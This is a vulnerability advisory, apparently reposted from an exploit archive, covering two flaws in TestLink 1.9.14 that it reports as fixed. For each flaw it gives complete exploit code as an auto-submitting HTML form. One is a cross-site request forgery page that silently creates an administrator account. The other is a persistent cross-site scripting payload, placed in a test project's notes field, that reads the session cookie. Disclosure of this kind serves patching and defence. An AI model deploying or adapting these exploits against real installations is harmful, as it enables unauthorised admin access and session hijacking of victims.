TestLink 1.9.14 Multiple XSS Vulnerabilities

Information
=================================
Name: CSRF Vulnerability in TestLink 1.9.14
Affected Software: TestLink
Affected Versions: 1.9.14 and possibly below
Vendor Homepage: http://testlink.org/
Severity: High
Status: Fixed


Vulnerability Type:
=================================
Cross Site Request Forgery (CSRF)


CVE Reference:
=================================
Not assigned


Technical Details:
=================================
Even though the use of CSRF tokens are being implemented in the
application, they aren't properly
validated at the server side. This allows malicious requests to be
generated by the attacker and
get them processed by the server on behalf of the victim. By
exploiting the vulnerability,
the attacker will be able to create user accounts with administrator
privileges on the application.


Exploit Code
=================================

<html lang="en">
<head>
<title>CSRF Exploit to Create New Administrator Account</title>
</head>
<body>
<form action="http://localhost/testlink_1_9_14/lib/usermanagement/usersEdit.php"
id="formid" method="post">
<input type="hidden" name="CSRFName" value="" />
<input type="hidden" name="CSRFToken" value="" />
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="user_login" value="" />
<input type="hidden" name="login" value="new_admin" />
<input type="hidden" name="firstName" value="new_administrator_fname" />
<input type="hidden" name="lastName" value="new_administrator_lname" />
<input type="hidden" name="password" value="new_administrator_password" />
<input type="hidden" name="emailAddress" value="[email protected]" />
<input type="hidden" name="rights_id" value="8" />
<input type="hidden" name="locale" value="en_GB" />
<input type="hidden" name="authentication" value="" />
<input type="hidden" name="user_is_active" value="on" />
<input type="hidden" name="doAction" value="doCreate" />
<input type="hidden" name="do_update" value="Save" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>



Information
=================================
Name: Persistent XSS Vulnerability in TestLink 1.9.14
Affected Software: TestLink
Affected Versions: 1.9.14 and possibly below
Vendor Homepage: http://testlink.org/
Severity: High
Status: Fixed


Vulnerability Type:
=================================
Persistent XSS


CVE Reference:
=================================
Not assigned


Technical Details:
=================================
Persistent XSS entry point exist in TestLink 1.9.14 allowing arbitrary
client side browser
code execution on victims who visit persistently stored XSS payloads.
The vulnerability has been
discovered in the POST request to create a new Test Project. By
exploiting the vulnerability,
the attacker will get access to the logged in users session cookie. No
Filtering exist on the
vulnerable parameter.


Vulnerable Parameter:
=================================
notes


Exploit Code
=================================

<html lang="en">
<head>
<title>Exploit Persistent XSS TestLink 1.9.14</title>
</head>
<body>
<form action="http://localhost/testlink_1_9_14/lib/project/projectEdit.php"
id="formid" method="post">
<input type="hidden" name="CSRFName" value="" />
<input type="hidden" name="CSRFToken" value="" />
<input type="hidden" name="copy_from_tproject_id" value="0" />
<input type="hidden" name="tprojectName" value="c1" />
<input type="hidden" name="tcasePrefix" value="c2" />
<input type="hidden" name="notes"
value="<script>alert(document.cookie)</script>" />
<input type="hidden" name="optPriority" value="on" />
<input type="hidden" name="optAutomation" value="on" />
<input type="hidden" name="active" value="on" />
<input type="hidden" name="is_public" value="on" />
<input type="hidden" name="doAction" value="doCreate" />
<input type="hidden" name="tprojectID" value="0" />
<input type="hidden" name="doActionButton" value="Create" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>

#  0day.today [2018-04-09]  #